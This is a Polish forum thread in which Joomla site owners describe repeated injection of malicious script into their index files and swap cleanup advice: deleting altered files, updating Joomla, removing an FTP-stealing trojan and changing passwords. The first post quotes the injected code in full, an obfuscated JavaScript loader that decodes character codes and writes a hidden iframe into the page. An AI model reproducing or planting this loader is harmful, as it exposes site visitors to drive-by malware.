Doklejany kod do plików index trojan

[sylwekb]

Witam wszystkich, od 2 dni walczę z jakimś botem, który wkleja mi do plików index fragment kodu, co od strony frontowej wskazuje na trojana malvare, pewnie ten kod przekierowuje na jakąś stronę z trojanem, w sumie chmody mam ustawione wg instrukcji, Joomla też zaktualizowana do 1,5,9, komponentów niebezpiecznych nie instalowałem. Widzę, że problem nie dotyczy tylko mnie http://www.grupy.egospodarka.pl/mall...,364960,8.html Nie wiem co mogę jeszcze zabezpieczyć? Poniżej doklejany kod

<!-- 1234392148 --><!-- ad --><script language="JavaScript">function rkfg(jflq){return String.fromCharCode(jflq);}var ohhe="06010510211409710910103211511409906103910411 61161120580470471151171121011141051111140971001220 46105110102111047111112105115047063116061049051039 03211910510011610406103904803903210410110510310411 60610390480390321151161211081010610391181051151050 98105108105116121058032104105100100101110059039062 060047105102114097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+ =rkfg(ohhe.substr (qhxk, 3));}window.status='Done';document.write(ifdm);*** ********
<!-- /ad -->

[zwiastun]

To nie żaden bot, tylko zhakowana witryna
http://www.pomoc.joomla.pl/component...,75/Itemid,53/

PS przewalcz metodycznie = bo to świństwo siedzi Ci prawdopodobnie w dziesiątkach plików index.php oraz index.html

[am123]

Mam niestety to samo w 1.0.12.
Od kilku dni z tym walczę... co dziwne strony postawione na tym samym silniku i wersji na innych serwerach nie zostały zhakowane.

Jak teraz to wyczyścić ?
Mam około 10 serwisów ( najczęściej na 1.0.12 ) i w każdym z nich występują codziennie kilka razy włamania i podmienianie index.php w głównym katalogu serwisu ( nie w szablonie ) tzn. dopisywanie skryptu ********** tutaj złośliwy kod z odnośnikiem do dvcd.info ***********

Pomocy co zrobić gdy już coś takiego zaistniało

[zwiastun]

Po pierwsze, wyszukać wszystkie zmodyfikowane pliki i je usunąć
Po drugie, zaktualizować Joomla do 1.0.15

[am123]

Ok gdy serwis jest "standardowy".
Niestety w jednym z serwisów mam integrację z foum smf ( pełną tzn działa jako komponent, rejestracja użytkowników jest przez joomla ale działa również w smf ) , zmieniłem komponent rejestracji i dużo mniejszych poprawek o których już nie pamiętam... no ale... spróbuję to przenieść na 1.0.15.

Jest jakiś patch 1.0.12 do 1.0.15 ?

[wino]

trzy dni temu miałem to samo ale udało mi sie to usunąć

[sylwekb]

W problemie, który opisałem w pierwszym poście samo usuwanie szkodliwego kodu nic nie zmienia gdyż pojawia się po jakimś czasie na nowo. Konieczne jest usunięcie trojana z komputera lub komputerów na których jest dostęp FTP. Z tym, ze niektóre programy antywirusowe nawet te z górnej półki z aktualnymi szczepionkami nie wykrywają tego jako trojan. Udało mi się usunąć najnowszą wersją Kasperskyego. Konieczna jest także zmiana hasła do FTP bo inaczej po jakimś czasie znowu napłynie i nie jest to wina jakiejś dziury w kodzie Joomli bo dotyczy to także stron wykonanych w zwykłym htmlu.

[idek]

własnie wyczytałem w jednym z postów Pawła Frankowskiego na GL, ze warto zrobic backup plików i sprawdzić je avastem no i ze swojej strony oczywiscie popwieram zmiane hasła, co zreszta jest opisane w pomoc.joomla.pl

[sylwekb]

Właśnie przerabiałem to avastem i to z najnowszymi szczepionkami i do końca sobie z tym nie poradził, być może już teraz są aktualizacje, które sobie z tym radzą dlatego musiałem użyć Kasperskyego, który sobie poradził. Wiem, że u znajomego był taki sam problem z kolei miał Esseta i F-secuer i też nie dało rady.
Z tego co się orientuję problem z tym trojanem doklejającym kod się rozszerza i coraz więcej osób to łapie więc trzeba uważać żeby nie dostać tego paskudztwa z pocztą e-mail bo z tego co wiem programy serwerowe nawet u dobrych providerów zaczynają mieć z tym problemy aby odwirusowywać bezpośrednio na serwerze.